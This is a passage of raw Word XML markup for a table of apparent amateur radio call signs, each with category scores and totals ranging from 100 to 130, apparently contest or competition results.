              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5D61F784"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134</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F5896" w:rsidRPr="001F5896" w14:paraId="1B11043F" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1170" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="409876B9"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KV8Z</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="340F6C67"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40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4EBE730D"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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7B508612"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="969" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5B346443"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70</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="03F744C5"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4015F8A8"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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="912" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="25F11CA0"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TOTAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="736" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2DE3E691"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130</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F5896" w:rsidRPr="001F5896" w14:paraId="02D4F56C" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1170" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="76DCA7DF"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KD8KBX</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0A20FEB1"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40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2ED77656"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40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1AE39743"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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="969" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="282EACE6"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25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="21ABB8F1"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="53E2B0AB"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="912" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3AA07606"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TOTAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="736" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="38DC9F38"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115</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F5896" w:rsidRPr="001F5896" w14:paraId="417F913D" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1170" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3ED7EE0D"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K8MDA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7CD43CF1"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40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7532E0AF"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32</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3BE29296"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20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="969" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7E1E4574"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6A5B5F7C"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4E6B0B10"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20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="912" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7B9437AE"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TOTAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="736" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="00290A5F"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112</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F5896" w:rsidRPr="001F5896" w14:paraId="0E9891E9" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1170" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="55F3A9E0"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KC8WH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7FC8E0FF"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40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="586C82AF"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40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="55DE4AB7"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30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="969" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4BE531D6"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="32B5B30A"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7FA2475E"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="912" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0F98DEF5"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TOTAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="736" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="76AE0F94"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110</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F5896" w:rsidRPr="001F5896" w14:paraId="15AF6F46" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1170" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0E2255EA"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AC8NP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5646A34F"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29</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6EF3FB77"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40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="21030868"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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="969" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0C664125"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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="49DDE73B"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="60FCA483"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20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="912" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="57402CE0"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TOTAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="736" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="54066DCF"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109</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F5896" w:rsidRPr="001F5896" w14:paraId="404BC143" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1170" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="064C9871"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WB8SIQ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4380C985"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40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3EBFBC12"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40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5C9EE6B0"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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="969" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5704DA35"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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="70340F26"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1836143A"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="912" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6DB2AC71"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TOTAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="736" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7A8E4DCE"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100</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F5896" w:rsidRPr="001F5896" w14:paraId="3CA27F8C" w14:textId="77777777" w:rsidTr="00F7328A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1170" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3541F0B2"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AC8RV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3DBBAFD6"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40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6455700B"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40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="855" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3CB844E4"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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="969" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0437B214"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 xml:space="preserve"> 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="67B7552C"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7F4B63C1"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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="912" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
